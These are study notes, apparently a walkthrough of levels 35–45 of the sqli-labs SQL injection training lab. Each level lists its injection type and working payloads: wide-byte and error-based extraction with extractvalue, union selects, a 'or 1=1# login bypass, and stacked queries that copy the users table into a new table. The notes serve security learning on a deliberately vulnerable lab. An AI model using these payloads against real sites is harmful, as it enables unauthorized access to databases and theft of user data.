sqllab第35-45关通关笔记

35关知识点：

• 宽字节注入
• 数值型注入
• 错误注入
  • payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
• 联合注入
  • payload:id=0+union+select+1,database(),version()--+

36关知识点：

• 字符型注入
• 宽字节注入
• 错误注入
  • payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
• 联合注入
  • payload:id=0%df%27union+select+1,database(),version()--+

37关知识点：

• 宽字节注入（bp抓包实现，不要直接在输入框中输入下面payload）
• 字符型注入
• 联合注入
  • payload:uname=1%df'union+select+database(),version()--+
• 错误注入
  • payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+

38关知识点：

• 字符型注入+单引号闭合
• 错误注入
  • payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
• 联合注入
  • payload:id=0%27union+select+1,database(),version()--+

39关知识点：

• 数值型注入
• 错误注入
  • payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
• 联合注入
  • payload:id=0+union+select+1,version(),database()

40关知识点：

• 字符型注入
  • 测试发现原始语句是 where id=('输入')
• 联合注入
  • payload:id=0%27)union+select+1,database(),3%20and+1=(%271
• 没有回显信息，不能进行错误注入

41关知识点：

• 数值型注入
• 联合注入
  • payload:id=0%20union+select+1,database(),version()
• 没有回显信息，不能进行错误注入
• 堆叠注入
  • payload:id=1;create%20table%20ren(id%20int);--+
    • 

42关知识点:

• 密码位置可以单引号绕过
  • payload:passwd='or+1=1#
• 堆叠注入
  • payload:passwd=';create table ren like users;#    (创建一个新表ren，格式和users一样)
  • payload:passwd=';insert into ren select * from users;#   (将users的内容插入到ren表中) 

43关知识点：

• 密码处读取输入为 where passwd=('输入')
  • payload:passwd=1')or 1=1#
• 堆叠注入
  • payload:passwd=');create table ren like users;#    (创建一个新表ren，格式和users一样)
  • payload:passwd=');insert into ren select * from users;#   (将users的内容插入到ren表中) 

44关知识点：

• 和42关的payload一模一样
• 直接过了

45关知识点：

• 和43关一样的payload
• 直接过了

10